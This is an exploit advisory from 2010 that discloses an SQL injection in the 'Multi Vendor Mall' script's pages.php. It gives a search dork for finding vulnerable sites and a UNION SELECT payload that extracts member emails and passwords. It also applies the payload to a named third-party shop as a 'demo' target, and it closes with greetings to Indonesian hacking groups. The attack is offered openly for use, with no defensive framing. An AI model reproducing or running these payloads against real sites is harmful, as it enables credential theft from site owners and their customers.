============================================================ Multi Vendor Mall (pages.php) SQL Injection Vulnerability ============================================================ ################################################################################################# [+] Multi Vendor Mall (pages.php) SQL Injection Vulnerability [+] By Newbie_Campuz [+] Published: 2010-05-24 Pukul 22.00 WIB [+] jatimcrew.org/ ################################################################################################## # Script Homepage: # http://www.multishopcms.com [+]Dork: pages.php?id= "Multi Vendor Mall" [+] SQL Injection http://[target]/[path]/pages.php?id=[SQL] http://[target]/[path]/pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl-- Demo : http://www.bestcraftsupplies.com/pages.php?id=7 http://www.bestcraftsupplies.com/pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl-- ################################################################################################## Thanks to Allah SWT n Nabi Muhammad SAW Special Thanks to : My Parent, My Brother n My Sister Byz9991, Doraemon, Bang_Napi, Kenthot_cakep, Bom2, Shamus, Chapzha, Ficarciruas, pheonixhaxor, mywisdom, Pr3tty, newbie_043, KidDevilz, Android2009, XcyberX, flyff666, MISTERFRIBO, Osean, Vhacx,jamsh0ut, elfata cybermuttaqin,k3m4ngi, roentah,zhombhie, techno_x46 and YOU... !!! All admin, momod, spamguard, staff and member Jatim Crew.. All admin, momod, spamguard, staff and member Indonesianhacker All admin, momod, spamguard, staff and member xteamweb All admin, momod, spamguard, staff and member h2ozones All admin, momod, spamguard, staff and member master-forum ##################################################################################################